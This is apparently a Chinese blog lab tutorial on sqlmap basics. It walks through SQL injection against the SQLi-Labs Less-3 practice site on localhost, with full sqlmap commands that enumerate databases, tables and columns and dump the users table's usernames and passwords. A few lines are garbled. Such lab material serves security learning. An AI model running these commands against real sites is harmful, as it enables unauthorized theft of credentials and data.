SQL注入-SQLMAP基础使用(十二)

实验目的
了解SQLMAP的工作原理,熟悉SQLMAP的常用命令,掌握SQLMAP的-u参数的基本使用方法。
实验环境
攻击机:吹毁目标

(2)安装的应用软件:sqlmapBurpsuiteFireFox浏览器及其插件Hackbar、 等

(3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890
靶机:司马华腾
(1)操作系统:本机(建议用虚拟机)不过我太懒了[]~( ̄▽ ̄)~*
(2)安装的应用软件:Apache、MySQL(MariaDB)、PHP:DVWA、SQLi-Labs、

webug3.0环境搭建

SQLMAP是一个开源的自动化SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。
SQLMAP的基本功能包括:判断可注入的参数、判断可以使用哪一种SQL注入技术进行注入、判断识别数据库的类型以及根据用户的选择从数据库中读取数据。
SQLMAP支持的注入技术包括以下五种:
(1)基于布尔的盲注:根据返回页面判断条件真假的注入。
(2)基于时间的盲注:不能根据页面返回内容判断任何信息,用条件语句查看
时间延迟语句是否执行(即页面返回时间是否增加)来判断。
(3)基于报错的注入:页面会返回错误信息,或者把注入的语句的结果直接返
回在页面中。
(4)基于联合查询的注入:可以使用UNION的情况下的注入。
(5)堆查询注入:同时执行多条语句的注入。
SOLMAP支持的数据库类型主要包括一些关系型数据库(RMDBS),如
MySQL、Oracle、 PostgresQL、Microsoft SQL Server、 Microsoft Access、IBM
DB2、SQLite、Firebird、Sybase、SAPMaxDB、Informix、HSQLDB等。
实验步骤

本实验的目标是:以SQLi-Labs网站的Less-3为入口,利用SQLMAP实施自
动化SQL注入,获取SQLi-Labs网站的登录用户名和密码。
1.访间SQLi-Labs网站
在攻击机Pentest-Atk打开FireFox浏览器,并访问粑机A-SQLi-Labs上的
SQLi-Labs网站Less-3。访间的URL为:

http://[机IP]/sqli-1abs/less-3/

登录后,根据网页提示,先给定一个GET参数,即;

http://127.0.0.1/sqli-labs-master/Less-3/?id=1

此时页面显示id=1的用户名Dump、密码Dump。

2.启动SQLMAP
启动Windows操作系统的命令行工具cmd:键入SQLmap路径

反之于目录直接cmd亦可

SQLmap的下载和安装使用教程_Gjqhs的博客-CSDN博客

 使用以下命令启动SQLMAP帮助:

python sqlmap.py -h

3.寻找注入点
使用以下命令自动寻找网站的注入点,并获取网站及后台数据库的基本信息:
pythonsqimappyu“http://靶机IP]/sqli-1abs/less-3/id=1”

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1

(可根据实际需要)               选择y                       /n

检测结果

 4.获取所有数据库的库名
(1)使用以下命令获取所有数据库的库名:

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' --dbs

所有库名

(2)使用以下命令获取网站当前所在数据库的库名:

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' --current-db

 获取成功

 检测结果:网站当前所在数据库的库名为security。

5.获取security数据库中所有的表名
使用以下命令获取security数据库中所有的表名:

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' -D security --tables

检测结果:security数据库中含有emails、referers、uagents、users四张表。

其中,有一个名为users的表,这当中往往存放着网站用户的基本信息。

6.获取users表的全部字段名
使用以下命令获取users表的全部字段名

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' -D security -T users --columns

 检测结果:users表中有三个字段id、username和password。

7.获取users表id、username和password字段的全部值
使用以下命令获取users表id、username和password字段的全部值

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' -D security -T users -C id,username,password --dump

 检测结果如下图所示:

 实验结束,你学废了吗

这不趁热再来几个

SQL注入 ——sql数据库操作基础(一)_Gjqhs的博客-CSDN博客

SQL注入-二阶注入(十)_Gjqhs的博客-CSDN博客

SQL注入-宽字节注入(十一)(面试热点)_Gjqhs的博客-CSDN博客

...

更多包括而不限于SQL注入的文章,关注我全部带走吧( •̀ ω •́ )✧

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值